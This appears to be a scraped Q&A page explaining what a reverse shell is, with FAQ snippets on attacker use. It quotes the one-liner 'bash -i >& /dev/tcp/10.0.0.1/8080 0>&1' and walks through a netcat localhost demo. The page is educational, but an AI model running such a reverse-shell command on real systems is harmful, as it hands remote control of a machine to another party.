Logo Questions Linux Laravel Mysql Ubuntu Git Menu
HTML CSS JAVASCRIPT SQL PYTHON PHP BOOTSTRAP JAVA JQUERY R React Kotlin
 

What is a reverse shell?

Tags:

shell

Could someone explain in deep what is reverse shell about and in what cases are we supposed to use it? I found this http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet regarding the same, what is the meaning of: 

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
like image 986
Walid Da. Avatar asked Feb 08 '16 14:02

Walid Da.

People also ask

What is reverse shell used for?

Reverse shells allow attackers to bypass network security mechanisms like firewalls. Attackers can achieve reverse shell capabilities via phishing emails or malicious websites. If the victim installs the malware on a local workstation, it initiates an outgoing connection to the attacker's command server.

What is a reverse shell attack?

Reverse shell is a kind of “virtual” shell that is initiated from a victim's computer to connect with attacker's computer. Once the connection is established, it allows attacker to send over commands to execute on the victim's computer and to get results back.

Why is it called a reverse shell?

How Does a Reverse Shell Works? Firewalls protect the victim's network from incoming connections, so its presence discourages bind shell sessions. Instead of directly requesting a shell session, an attacker waits for a victim's machine to initiate an outgoing connection—hence, it is called a “reverse” shell.

What is a reverse shell payload?

What is a Reverse Shell? Oppose to a Bind Shell, a Reverse Shell connects back to the attacker's computer upon a payload executed on the victim's system. This type of shell is more useful when the target organization has a strong Firewalls for inbound connection.

1 Answers

It's a(n insecure) remote shell introduced by the target. That's the opposite of a "normal" remote shell, that is introduced by the source.

Let's try it with localhost instead of 10.0.0.1:

  • Open two tabs in your terminal.

    1. open TCP port 8080 and wait for a connection:

       nc localhost -lp 8080

    2. Open an interactive shell, and redirect the IO streams to a TCP socket:

       bash -i >& /dev/tcp/localhost/8080 0>&1

      where

      • bash -i "If the -i option is present, the shell is interactive."
      • >& "This special syntax redirects both, stdout and stderr to the specified target."
      • (argument for >&) /dev/tcp/localhost/8080 is a TCP client connection to localhost:8080.
      • 0>&1 redirect file descriptor 0 (stdin) to fd 1 (stdout), hence the opened TCP socket is used to read input.

      Cf. http://wiki.bash-hackers.org/syntax/redirection

  • Rejoice as you have a prompt in tab 1.
  • Now imagine not using localhost, but some remote IP.
like image 94
kay Avatar answered Sep 21 '22 23:09

kay
Sign in to Comment

Related questions

if statement to check $HOSTNAME in shell script
Difference between "./" and "sh" in UNIX
How to input automatically when running a shell over SSH?
Saving awk output to variable [duplicate]
Why does wget ignore the query string in the URL?
Get mtime of specific file using Bash?
Output file lines from last to first in Bash
How to fix ctrl+c inside a docker container
Run sql file in database from terminal
\curl ... | bash ... what's the slash for? [duplicate]
Connect to sqlplus in a shell script and run SQL scripts
VSCode Integrated Terminal Doesn't Load .bashrc or .bash_profile
Shell scripting: die on any error
how to write finding output to same file using awk command
Mac OS X - run shell script from the desktop GUI
Shell 'tar: not found in archive' error when using regular expression
Execute shell command without filtering from Vim
Methods to detect public IP address in bash
Override a variable in a Bash script from the command line
Add a relative path to $PATH on fish startup

Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!